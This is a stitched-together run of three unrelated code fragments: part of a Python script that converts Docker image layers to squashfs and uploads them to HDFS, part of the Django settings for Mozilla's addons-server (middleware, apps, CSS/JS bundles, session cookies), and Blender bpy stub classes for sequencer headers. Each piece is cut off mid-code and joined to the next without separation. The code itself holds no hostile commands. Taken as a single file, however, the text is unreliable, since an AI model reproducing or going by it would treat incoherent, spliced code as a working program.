read_image_tag_to_hash(local_image_tag_to_hash) else: hash_to_tags = {} tag_to_hash = {} return hash_to_tags, tag_to_hash, image_tag_to_hash_hash def setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path): logging.debug("Setting up squashfs hdfs_dirs: %s", str(hdfs_dirs)) setup_hdfs_dirs(hdfs_dirs) if not does_hdfs_entry_exist(image_tag_to_hash_path, raise_on_error=False): hdfs_touchz(image_tag_to_hash_path) hdfs_chmod("755", image_tag_to_hash_path) def skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir): logging.info("Pulling image: %s", image) if os.path.isdir(skopeo_dir): raise Exception("Skopeo output directory already exists. " + "Please delete and try again " + "Directory: " + skopeo_dir) pull_fmt_string = get_pull_fmt_string(pull_format) shell_command(["skopeo", "copy", pull_fmt_string + image, skopeo_format + ":" + skopeo_dir], False, True, True, 600) def untar_layer(tmp_dir, layer_path): shell_command(["tar", "-C", tmp_dir, "--xattrs", "--xattrs-include='*'", "-xf", layer_path], False, True, True, 600) def tar_file_search(archive, target): out, err, returncode = shell_command(["tar", "-xf", archive, target, "-O"], False, False, False, 600) return out def set_fattr(directory): shell_command(["setfattr", "-n", "trusted.overlay.opaque", "-v", "y", directory], False, True, True) def make_whiteout_block_device(file_path, whiteout): shell_command(["mknod", "-m", "000", file_path, "c", "0", "0"], False, True, True) out, err, returncode = shell_command(["stat", "-c", "%U:%G", whiteout], False, True, True) perms = str(out).strip() shell_command(["chown", perms, file_path], False, True, True) def convert_oci_whiteouts(tmp_dir): out, err, returncode = shell_command(["find", tmp_dir, "-name", ".wh.*"], False, False, True, 60) whiteouts = str(out).splitlines() for whiteout in whiteouts: if whiteout == 0: continue basename = os.path.basename(whiteout) directory = os.path.dirname(whiteout) if basename == ".wh..wh..opq": set_fattr(directory) else: whiteout_string = ".wh." idx = basename.rfind(whiteout_string) bname = basename[idx+len(whiteout_string):] file_path = os.path.join(directory, bname) make_whiteout_block_device(file_path, whiteout) shell_command(["rm", whiteout], False, True, True) def dir_to_squashfs(tmp_dir, squash_path): shell_command(["/usr/sbin/mksquashfs", tmp_dir, squash_path, "-write-queue", "4096", "-read-queue", "4096", "-fragment-queue", "4096"], False, True, True, 600) def upload_to_hdfs(file_path, file_name, hdfs_dir, replication, mode, force=False): dest = hdfs_dir + "/" + file_name if does_hdfs_entry_exist(dest, raise_on_error=False): if not force: logging.warn("Not uploading to HDFS. File already exists: %s", dest) return logging.info("File already exists, but overwriting due to force option: %s", dest) hdfs_put(file_path, dest, force) hdfs_setrep(replication, dest) hdfs_chmod(mode, dest) logging.info("Uploaded file %s with replication %d and permissions %s", dest, replication, mode) def atomic_upload_mv_to_hdfs(file_path, file_name, hdfs_dir, replication, image_tag_to_hash_file_hash): global HADOOP_PREFIX local_hash = calculate_file_hash(file_path) if local_hash == image_tag_to_hash_file_hash: logging.info("image_tag_to_hash file unchanged. Not uploading") return tmp_file_name = file_name + ".tmp" hdfs_tmp_path = hdfs_dir + "/" + tmp_file_name hdfs_file_path = hdfs_dir + "/" + file_name try: if does_hdfs_entry_exist(hdfs_tmp_path, raise_on_error=False): hdfs_rm(hdfs_tmp_path) hdfs_put(file_path, hdfs_tmp_path) hdfs_setrep(replication, hdfs_tmp_path) hdfs_chmod("444", hdfs_tmp_path) jar_path = HADOOP_PREFIX + "/share/hadoop/tools/lib/hadoop-extras-*.jar" jar_file = None for file in glob.glob(jar_path): jar_file = file if not jar_file: raise Exception("SymlinkTool Jar doesn't exist: %s" % (jar_path)) logging.debug("jar_file: " + jar_file) shell_command(["hadoop", "jar", jar_file, "org.apache.hadoop.tools.SymlinkTool", "mvlink", "-f", hdfs_tmp_path, hdfs_file_path], False, False, True) except: if does_hdfs_entry_exist(hdfs_tmp_path, raise_on_error=False): hdfs_rm(hdfs_tmp_path) raise Exception("image tag to hash file upload failed") def docker_to_squash(layer_dir, layer, working_dir): tmp_dir = os.path.join(working_dir, "expand_archive_" + layer) layer_path = os.path.join(layer_dir, layer) squash_path = layer_path + ".sqsh" if os.path.isdir(tmp_dir): raise Exception("tmp_dir already exists. Please delete and try again " + "Directory: " + tmp_dir) os.makedirs(tmp_dir) try: untar_layer(tmp_dir, layer_path) convert_oci_whiteouts(tmp_dir) dir_to_squashfs(tmp_dir, squash_path) finally: os.remove(layer_path) shell_command(["rm", "-rf", tmp_dir], False, True, True) def check_image_for_magic_file(magic_file, skopeo_dir, layers): magic_file_absolute = magic_file.strip("/") logging.debug("Searching for magic file %s", magic_file_absolute) for layer in layers: ret = tar_file_search(os.path.join(skopeo_dir, layer), magic_file_absolute) if ret: logging.debug("Found magic file %s in layer %s", magic_file_absolute, layer) logging.debug("Magic file %s has contents:\n%s", magic_file_absolute, ret) return ret raise Exception("Magic file %s doesn't exist in any layer" % (magic_file_absolute)) def pull_build_push_update(args): skopeo_format = args.skopeo_format pull_format = args.pull_format hdfs_root = args.hdfs_root image_tag_to_hash = args.image_tag_to_hash replication = args.replication force = args.force images_and_tags = args.images_and_tags check_magic_file = args.check_magic_file magic_file = args.magic_file bootstrap = args.bootstrap hdfs_layers_dir = hdfs_root + "/layers" hdfs_config_dir = hdfs_root + "/config" hdfs_manifest_dir = hdfs_root + "/manifests" working_dir = None try: working_dir = get_working_dir(args.working_dir) local_image_tag_to_hash = os.path.join(working_dir, os.path.basename(image_tag_to_hash)) if bootstrap: hdfs_dirs = [hdfs_root, hdfs_layers_dir, hdfs_config_dir, hdfs_manifest_dir] image_tag_to_hash_path = hdfs_root + "/" + image_tag_to_hash setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path) hash_to_tags, tag_to_hash, image_tag_to_hash_hash = populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash) for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) manifest, manifest_hash = get_manifest_from_docker_image(pull_format, image) layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, image) all_layers_exist = True if not does_hdfs_entry_exist(hdfs_manifest_dir + "/" + manifest_hash, raise_on_error=False): all_layers_exist = False if not does_hdfs_entry_exist(hdfs_config_dir + "/" + config_hash, raise_on_error=False): all_layers_exist = False for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if not does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): all_layers_exist = False break if all_layers_exist: if not force: logging.info("All layers exist in HDFS, skipping this image") continue logging.info("All layers exist in HDFS, but force option set, so overwriting image") skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) logging.debug("skopeo_dir: %s", skopeo_dir) skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir) if check_magic_file: check_image_for_magic_file(magic_file, skopeo_dir, layers) for layer in layers: logging.info("Squashifying and uploading layer: %s", layer) hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): if force: logging.info("Layer already exists, but overwriting due to force" + "option: %s", layer) else: logging.info("Layer exists. Skipping and not squashifying or" + "uploading: %s", layer) continue docker_to_squash(skopeo_dir, layer, working_dir) squash_path = os.path.join(skopeo_dir, layer + ".sqsh") squash_name = os.path.basename(squash_path) upload_to_hdfs(squash_path, squash_name, hdfs_layers_dir, replication, "444", force) config_local_path = os.path.join(skopeo_dir, config_hash) upload_to_hdfs(config_local_path, os.path.basename(config_local_path), hdfs_config_dir, replication, "444", force) manifest_local_path = os.path.join(skopeo_dir, "manifest.json") upload_to_hdfs(manifest_local_path, manifest_hash, hdfs_manifest_dir, replication, "444", force) write_local_image_tag_to_hash(local_image_tag_to_hash, hash_to_tags) atomic_upload_mv_to_hdfs(local_image_tag_to_hash, image_tag_to_hash, hdfs_root, replication, image_tag_to_hash_hash) finally: if working_dir: if os.path.isdir(working_dir): shell_command(["rm", "-rf", working_dir], False, True, True) def pull_build(args): skopeo_format = args.skopeo_format pull_format = args.pull_format images_and_tags = args.images_and_tags check_magic_file = args.check_magic_file magic_file = args.magic_file for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) manifest, manifest_hash = get_manifest_from_docker_image(pull_format, image) layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) try: working_dir = get_working_dir(args.working_dir) skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) logging.debug("skopeo_dir: %s", skopeo_dir) skopeo_copy_image(pull_format, image, skopeo_format, skopeo_dir) if check_magic_file: check_image_for_magic_file(magic_file, skopeo_dir, layers) for layer in layers: logging.info("Squashifying layer: %s", layer) docker_to_squash(skopeo_dir, layer, working_dir) except: if os.path.isdir(skopeo_dir): shutil.rmtree(skopeo_dir) raise def push_update(args): hdfs_root = args.hdfs_root image_tag_to_hash = args.image_tag_to_hash replication = args.replication force = args.force images_and_tags = args.images_and_tags bootstrap = args.bootstrap hdfs_layers_dir = hdfs_root + "/layers" hdfs_config_dir = hdfs_root + "/config" hdfs_manifest_dir = hdfs_root + "/manifests" local_image_tag_to_hash = None try: working_dir = get_working_dir(args.working_dir) local_image_tag_to_hash = os.path.join(working_dir, os.path.basename(image_tag_to_hash)) if bootstrap: hdfs_dirs = [hdfs_root, hdfs_layers_dir, hdfs_config_dir, hdfs_manifest_dir] image_tag_to_hash_path = hdfs_root + "/" + image_tag_to_hash setup_squashfs_hdfs_dirs(hdfs_dirs, image_tag_to_hash_path) hash_to_tags, tag_to_hash, image_tag_to_hash_hash = populate_tag_dicts(hdfs_root, image_tag_to_hash, local_image_tag_to_hash) for image_and_tag_arg in images_and_tags: image, tags = split_image_and_tag(image_and_tag_arg) if not image or not tags: raise Exception("Positional parameter requires an image and at least 1 tag: " + image_and_tag_arg) logging.info("Working on image %s with tags %s", image, str(tags)) skopeo_dir = os.path.join(working_dir, image.split("/")[-1]) if not os.path.exists(skopeo_dir): raise Exception("skopeo_dir doesn't exists: %s" % (skopeo_dir)) manifest, manifest_hash = get_local_manifest_from_path(skopeo_dir + "/manifest.json") layers = get_layer_hashes_from_manifest(manifest) config_hash = get_config_hash_from_manifest(manifest) logging.debug("Layers: %s", str(layers)) logging.debug("Config: %s", str(config_hash)) update_dicts_for_multiple_tags(hash_to_tags, tag_to_hash, tags, manifest_hash, image) all_layers_exist = True if not does_hdfs_entry_exist(hdfs_manifest_dir + "/" + manifest_hash, raise_on_error=False): all_layers_exist = False if not does_hdfs_entry_exist(hdfs_config_dir + "/" + config_hash, raise_on_error=False): all_layers_exist = False for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if not does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): all_layers_exist = False break if all_layers_exist: if not force: logging.info("All layers exist in HDFS, skipping this image") continue logging.info("All layers exist in HDFS, but force option set, so overwriting image") for layer in layers: hdfs_squash_path = hdfs_layers_dir + "/" + layer + ".sqsh" if does_hdfs_entry_exist(hdfs_squash_path, raise_on_error=False): if force: logging.info("Layer already exists, but overwriting due to force" + "option: %s", layer) else: logging.info("Layer exists. Skipping and not squashifying or"
the top. 'olympia.amo.middleware.NonAtomicRequestsForSafeHttpMethodsMiddleware', # Test if it's an API request first so later middlewares don't need to. 'olympia.api.middleware.IdentifyAPIRequestMiddleware', # Gzip (for API only) middleware needs to be executed after every # modification to the response, so it's placed at the top of the list. 'olympia.api.middleware.GZipMiddlewareForAPIOnly', # Statsd and logging come first to get timings etc. Munging REMOTE_ADDR # must come before middlewares potentially using REMOTE_ADDR, so it's # also up there. 'django_statsd.middleware.GraphiteRequestTimingMiddleware', 'django_statsd.middleware.GraphiteMiddleware', 'olympia.amo.middleware.SetRemoteAddrFromForwardedFor', # AMO URL middleware is as high as possible to get locale/app aware URLs. 'olympia.amo.middleware.LocaleAndAppURLMiddleware', 'olympia.amo.middleware.RemoveSlashMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'multidb.middleware.PinningRouterMiddleware', 'waffle.middleware.WaffleMiddleware', # CSP and CORS need to come before CommonMiddleware because they might # need to add headers to 304 responses returned by CommonMiddleware. 'csp.middleware.CSPMiddleware', 'corsheaders.middleware.CorsMiddleware', # Enable conditional processing, e.g ETags. 'django.middleware.http.ConditionalGetMiddleware', 'olympia.amo.middleware.CommonMiddleware', 'olympia.amo.middleware.NoVarySessionMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'olympia.amo.middleware.AuthenticationMiddlewareWithoutAPI', # Our middleware that adds additional information for the user # and API about our read-only status. 'olympia.amo.middleware.ReadOnlyMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', # This should come after AuthenticationMiddlewareWithoutAPI (to get the # current user) and after SetRemoteAddrFromForwardedFor (to get the correct # IP). 'olympia.access.middleware.UserAndAddrMiddleware', 'olympia.amo.middleware.RequestIdMiddleware', ) # Auth AUTH_USER_MODEL = 'users.UserProfile' # Override this in the site settings. ROOT_URLCONF = 'olympia.urls' INSTALLED_APPS = ( # The translations app *must* be the very first. This isn't necessarily # relevant for daily business but very important for running initial # migrations during our tests and local setup. # Foreign keys to the `translations` table point to `id` which isn't # unique on it's own but has a (id, locale) unique_together index. # If `translations` would come after `olympia.addons` for example # Django tries to first, create the table translations, then create the # addons table, then adds the foreign key and only after that adds the # unique_together index to `translations`. MySQL needs that index to be # created first though, otherwise you'll run into # `ERROR 1215 (HY000): Cannot add foreign key constraint` errors. 'olympia.translations', 'olympia.core', 'olympia.amo', # amo comes first so it always takes precedence. 'olympia.abuse', 'olympia.access', 'olympia.accounts', 'olympia.activity', 'olympia.addons', 'olympia.api', 'olympia.applications', 'olympia.bandwagon', 'olympia.blocklist', 'olympia.browse', 'olympia.devhub', 'olympia.discovery', 'olympia.files', 'olympia.git', 'olympia.hero', 'olympia.lib.es', 'olympia.lib.akismet', 'olympia.pages', 'olympia.promoted', 'olympia.ratings', 'olympia.reviewers', 'olympia.scanners', 'olympia.search', 'olympia.shelves', 'olympia.stats', 'olympia.tags', 'olympia.users', 'olympia.versions', 'olympia.yara', 'olympia.zadmin', # Third party apps 'csp', 'aesfield', 'django_extensions', 'rest_framework', 'waffle', 'django_jinja', 'puente', 'rangefilter', # Django contrib apps 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.messages', 'django.contrib.sessions', 'django.contrib.staticfiles', # Has to load after auth 'django_statsd', ) # These need to point to prod, because that's where the database lives. You can # change it locally to test the extraction process, but be careful not to # accidentally nuke translations when doing that! DISCOVERY_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/discovery/editorial/') PRIMARY_HERO_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/hero/primary/?all=true&raw') SECONDARY_HERO_EDITORIAL_CONTENT_API = ( 'https://addons.mozilla.org/api/v4/hero/secondary/?all=true') # Filename where the strings will be stored. Used in puente config below. EDITORIAL_CONTENT_FILENAME = 'src/olympia/discovery/strings.jinja2' # Tells the extract script what files to look for l10n in and what function # handles the extraction. The puente library expects this. PUENTE = { 'BASE_DIR': ROOT, # Tells the extract script what files to look for l10n in and what function # handles the extraction. 'DOMAIN_METHODS': { 'django': [ ('src/olympia/**.py', 'python'), # Extract the generated file containing editorial content for all # disco pane recommendations using jinja2 parser. It's not a real # template, but it uses jinja2 syntax for convenience, hence why # it's not in templates/ with a .html extension. (EDITORIAL_CONTENT_FILENAME, 'jinja2'), # Make sure we're parsing django-admin & email templates with the # django template extractor. This should match the behavior of # JINJA_EXCLUDE_TEMPLATE_PATHS ( 'src/olympia/**/templates/**/emails/**.*', 'django_babel.extract.extract_django' ), ( '**/templates/admin/**.html', 'django_babel.extract.extract_django' ), ('src/olympia/**/templates/**.html', 'jinja2'), ], 'djangojs': [ # We can't say **.js because that would dive into mochikit # and timeplot and all the other baggage we're carrying. # Timeplot, in particular, crashes the extractor with bad # unicode data. ('static/js/**-all.js', 'ignore'), ('static/js/**-min.js', 'ignore'), ('static/js/*.js', 'javascript'), ('static/js/amo2009/**.js', 'javascript'), ('static/js/common/**.js', 'javascript'), ('static/js/impala/**.js', 'javascript'), ('static/js/zamboni/**.js', 'javascript'), ], }, } # Bundles is a dictionary of two dictionaries, css and js, which list css files # and js files that can be bundled together by the minify app. MINIFY_BUNDLES = { 'css': { 'restyle/css': ( 'css/restyle/restyle.less', ), # CSS files our DevHub (currently only required for the # new landing page) 'devhub/new-landing/css': ( 'css/devhub/new-landing/base.less', ), # Responsive error page styling. 'errors/css': ( 'css/errors/base.less', ), # CSS files common to the entire site. 'zamboni/css': ( 'css/legacy/main.css', 'css/legacy/main-mozilla.css', 'css/legacy/jquery-lightbox.css', 'css/zamboni/zamboni.css', 'css/zamboni/tags.css', 'css/zamboni/tabs.css', 'css/impala/buttons.less', 'css/impala/formset.less', 'css/impala/suggestions.less', 'css/impala/header.less', 'css/impala/moz-tab.css', 'css/impala/footer.less', 'css/impala/faux-zamboni.less', ), 'zamboni/impala': ( 'css/impala/base.css', 'css/legacy/jquery-lightbox.css', 'css/impala/site.less', 'css/impala/typography.less', 'css/impala/forms.less', 'css/common/invisible-upload.less', 'css/impala/header.less', 'css/impala/footer.less', 'css/impala/moz-tab.css', 'css/impala/hovercards.less', 'css/impala/toplist.less', 'css/impala/carousel.less', 'css/impala/ratings.less', 'css/impala/buttons.less', 'css/impala/promos.less', 'css/impala/addon_details.less', 'css/impala/policy.less', 'css/impala/expando.less', 'css/impala/popups.less', 'css/impala/l10n.less', 'css/impala/lightbox.less', 'css/impala/prose.less', 'css/impala/abuse.less', 'css/impala/paginator.less', 'css/impala/listing.less', 'css/impala/versions.less', 'css/impala/users.less', 'css/impala/tooltips.less', 'css/impala/search.less', 'css/impala/suggestions.less', 'css/node_lib/jquery.minicolors.css', 'css/impala/login.less', 'css/impala/dictionaries.less', 'css/impala/apps.less', 'css/impala/formset.less', 'css/impala/tables.less', 'css/impala/compat.less', ), 'zamboni/stats': ( 'css/impala/stats.less', ), 'zamboni/discovery-pane': ( 'css/impala/promos.less', 'css/legacy/jquery-lightbox.css', ), 'zamboni/devhub': ( 'css/impala/tooltips.less', 'css/zamboni/developers.css', 'css/zamboni/docs.less', 'css/impala/developers.less', 'css/devhub/listing.less', 'css/devhub/popups.less', 'css/devhub/compat.less', 'css/impala/formset.less', 'css/devhub/forms.less', 'css/common/invisible-upload.less', 'css/devhub/submission.less', 'css/devhub/refunds.less', 'css/devhub/buttons.less', 'css/devhub/in-app-config.less', 'css/devhub/static-theme.less', 'css/node_lib/jquery.minicolors.css', ), 'zamboni/devhub_impala': ( 'css/impala/developers.less', 'css/devhub/listing.less', 'css/devhub/popups.less', 'css/devhub/compat.less', 'css/devhub/dashboard.less', 'css/devhub/forms.less', 'css/common/invisible-upload.less', 'css/devhub/submission.less', 'css/devhub/search.less', 'css/devhub/refunds.less', 'css/impala/devhub-api.less', ), 'zamboni/reviewers': ( 'css/zamboni/reviewers.less', 'css/zamboni/unlisted.less', ), 'zamboni/themes_review': ( 'css/zamboni/developers.css', 'css/zamboni/reviewers.less', 'css/zamboni/themes_review.less', ), 'zamboni/admin': ( 'css/zamboni/admin-django.css', 'css/zamboni/admin-mozilla.css', 'css/zamboni/admin_features.css', ), }, 'js': { # JS files common to the entire site, apart from dev-landing. 'common': ( 'js/node_lib/underscore.js', 'js/zamboni/browser.js', 'js/amo2009/addons.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/zamboni/tabs.js', 'js/common/keys.js', # jQuery UI 'js/node_lib/ui/version.js', 'js/node_lib/ui/data.js', 'js/node_lib/ui/disable-selection.js', 'js/node_lib/ui/ie.js', 'js/node_lib/ui/keycode.js', 'js/node_lib/ui/escape-selector.js', 'js/node_lib/ui/labels.js', 'js/node_lib/ui/jquery-1-7.js', 'js/node_lib/ui/plugin.js', 'js/node_lib/ui/safe-active-element.js', 'js/node_lib/ui/safe-blur.js', 'js/node_lib/ui/scroll-parent.js', 'js/node_lib/ui/focusable.js', 'js/node_lib/ui/tabbable.js', 'js/node_lib/ui/unique-id.js', 'js/node_lib/ui/position.js', 'js/node_lib/ui/widget.js', 'js/node_lib/ui/menu.js', 'js/node_lib/ui/mouse.js', 'js/node_lib/ui/autocomplete.js', 'js/node_lib/ui/datepicker.js', 'js/node_lib/ui/sortable.js', 'js/zamboni/helpers.js', 'js/common/banners.js', 'js/zamboni/global.js', 'js/amo2009/global.js', 'js/common/ratingwidget.js', 'js/node_lib/jqModal.js', 'js/zamboni/l10n.js', 'js/zamboni/debouncer.js', # Homepage 'js/zamboni/homepage.js', # Add-ons details page 'js/lib/ui.lightbox.js', 'js/zamboni/addon_details.js', 'js/impala/abuse.js', 'js/zamboni/ratings.js', 'js/lib/jquery.hoverIntent.js', # Unicode letters for our makeslug function 'js/zamboni/unicode.js', # Users 'js/zamboni/users.js', # Search suggestions 'js/impala/forms.js', 'js/impala/ajaxcache.js', 'js/impala/suggestions.js', 'js/impala/site_suggestions.js', ), # Impala and Legacy: Things to be loaded at the top of the page 'preload': ( 'js/node_lib/jquery.js', 'js/node_lib/jquery.browser.js', 'js/impala/preloaded.js', 'js/zamboni/analytics.js', ), # Impala: Things to be loaded at the bottom 'impala': ( 'js/lib/ngettext-overload.js', 'js/node_lib/underscore.js', 'js/impala/carousel.js', 'js/zamboni/browser.js', 'js/amo2009/addons.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/node_lib/jquery.pjax.js', # jquery.pjax.js is missing a semicolon at the end which breaks # our wonderful minification process... so add one. 'js/lib/semicolon.js', # It's just a semicolon! 'js/impala/footer.js', 'js/common/keys.js', # jQuery UI 'js/node_lib/ui/version.js', 'js/node_lib/ui/data.js', 'js/node_lib/ui/disable-selection.js', 'js/node_lib/ui/ie.js', 'js/node_lib/ui/keycode.js', 'js/node_lib/ui/escape-selector.js', 'js/node_lib/ui/labels.js', 'js/node_lib/ui/jquery-1-7.js', 'js/node_lib/ui/plugin.js', 'js/node_lib/ui/safe-active-element.js', 'js/node_lib/ui/safe-blur.js', 'js/node_lib/ui/scroll-parent.js', 'js/node_lib/ui/focusable.js', 'js/node_lib/ui/tabbable.js', 'js/node_lib/ui/unique-id.js', 'js/node_lib/ui/position.js', 'js/node_lib/ui/widget.js', 'js/node_lib/ui/mouse.js', 'js/node_lib/ui/menu.js', 'js/node_lib/ui/autocomplete.js', 'js/node_lib/ui/datepicker.js', 'js/node_lib/ui/sortable.js', 'js/lib/truncate.js', 'js/zamboni/truncation.js', 'js/impala/ajaxcache.js', 'js/zamboni/helpers.js', 'js/common/banners.js', 'js/zamboni/global.js', 'js/impala/global.js', 'js/common/ratingwidget.js', 'js/node_lib/jqModal.js', 'js/zamboni/l10n.js', 'js/impala/forms.js', # Add-ons details page 'js/lib/ui.lightbox.js', 'js/impala/addon_details.js', 'js/impala/abuse.js', 'js/impala/ratings.js', # Browse listing pages 'js/impala/listing.js', 'js/lib/jquery.hoverIntent.js', 'js/common/upload-image.js', 'js/node_lib/jquery.minicolors.js', # Unicode letters for our makeslug function 'js/zamboni/unicode.js', # Users 'js/zamboni/users.js', 'js/impala/users.js', # Search 'js/impala/serializers.js', 'js/impala/search.js', 'js/impala/suggestions.js', 'js/impala/site_suggestions.js', # Login 'js/impala/login.js', ), 'zamboni/discovery': ( 'js/node_lib/jquery.js', 'js/node_lib/jquery.browser.js', 'js/node_lib/underscore.js', 'js/zamboni/browser.js', 'js/zamboni/init.js', 'js/impala/capabilities.js', 'js/lib/format.js', 'js/impala/carousel.js', 'js/zamboni/analytics.js', # Add-ons details 'js/node_lib/jquery.cookie.js', 'js/zamboni/storage.js', 'js/zamboni/buttons.js', 'js/lib/ui.lightbox.js', 'js/lib/jquery.hoverIntent.js', 'js/zamboni/debouncer.js', 'js/lib/truncate.js', 'js/zamboni/truncation.js', ), 'zamboni/devhub': ( 'js/lib/truncate.js', 'js/zamboni/truncation.js', 'js/common/upload-base.js', 'js/common/upload-addon.js', 'js/common/upload-image.js', 'js/impala/formset.js', 'js/zamboni/devhub.js', 'js/zamboni/validator.js', 'js/node_lib/jquery.timeago.js', 'js/zamboni/static_theme.js', 'js/node_lib/jquery.minicolors.js', 'js/node_lib/jszip.js', ), 'devhub/new-landing/js': ( 'js/common/lang_switcher.js', 'js/lib/basket-client.js', ), 'zamboni/reviewers': ( 'js/lib/highcharts.src.js', 'js/lib/jquery.hoverIntent.js', # Used by jquery.zoomBox. 'js/lib/jquery.zoomBox.js', # Used by themes_review. 'js/zamboni/reviewers.js', 'js/zamboni/themes_review_templates.js', 'js/zamboni/themes_review.js', ), 'zamboni/stats': ( 'js/lib/highcharts.src.js', 'js/impala/stats/csv_keys.js', 'js/impala/stats/helpers.js', 'js/impala/stats/dateutils.js', 'js/impala/stats/manager.js', 'js/impala/stats/controls.js', 'js/impala/stats/overview.js', 'js/impala/stats/topchart.js', 'js/impala/stats/chart.js', 'js/impala/stats/table.js', 'js/impala/stats/stats.js', ), 'zamboni/admin': ( 'js/zamboni/admin.js', 'js/zamboni/admin_features.js', 'js/zamboni/admin_validation.js', ), # This is included when DEBUG is True. Bundle in <head>. 'debug': ( 'js/debug/less_setup.js', 'js/node_lib/less.js', 'js/debug/less_live.js', ), } } # Prefix for cache keys (will prevent collisions when running parallel copies) # This value is being used by `conf/settings/{dev,stage,prod}.py CACHE_KEY_PREFIX = 'amo:%s:' % build_id CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_KEY_PREFIX FETCH_BY_ID = True # Number of seconds a count() query should be cached. Keep it short because # it's not possible to invalidate these queries. CACHE_COUNT_TIMEOUT = 60 # To enable pylibmc compression (in bytes) PYLIBMC_MIN_COMPRESS_LEN = 0 # disabled # External tools. JAVA_BIN = '/usr/bin/java' # File paths ADDON_ICONS_DEFAULT_PATH = os.path.join(ROOT, 'static', 'img', 'addon-icons') # URL paths # paths for images, e.g. mozcdn.com/amo or '/static' VAMO_URL = 'https://versioncheck.addons.mozilla.org' # Outgoing URL bouncer REDIRECT_URL = 'https://outgoing.prod.mozaws.net/v1/' REDIRECT_SECRET_KEY = env('REDIRECT_SECRET_KEY', default='') # Allow URLs from these servers. Use full domain names. REDIRECT_URL_ALLOW_LIST = ['addons.mozilla.org'] # Default to short expiration; check "remember me" to override SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies' # See: https://github.com/mozilla/addons-server/issues/1789 SESSION_EXPIRE_AT_BROWSER_CLOSE = False # This value must be kept in sync with authTokenValidFor from addons-frontend: # https://github.com/mozilla/addons-frontend/blob/2f480b474fe13a676237fe76a1b2a057e4a2aac7/config/default-amo.js#L111 SESSION_COOKIE_AGE = 2592000 # 30 days SESSION_COOKIE_SECURE = True SESSION_COOKIE_HTTPONLY = True SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN # bug 608797 MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage' WAFFLE_SECURE = True # These should have app+locale at the
<gh_stars>1-10 import sys import typing import bpy_types import bl_ui.space_toolsystem_common import bl_ui.properties_grease_pencil_common import rna_prop_ui class SEQUENCER_HT_header(bpy_types.Header, bpy_types._GenericUI): bl_rna = None ''' ''' bl_space_type = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_HT_tool_header(bpy_types.Header, bpy_types._GenericUI): bl_region_type = None ''' ''' bl_rna = None ''' ''' bl_space_type = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_tool_settings(self, context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' 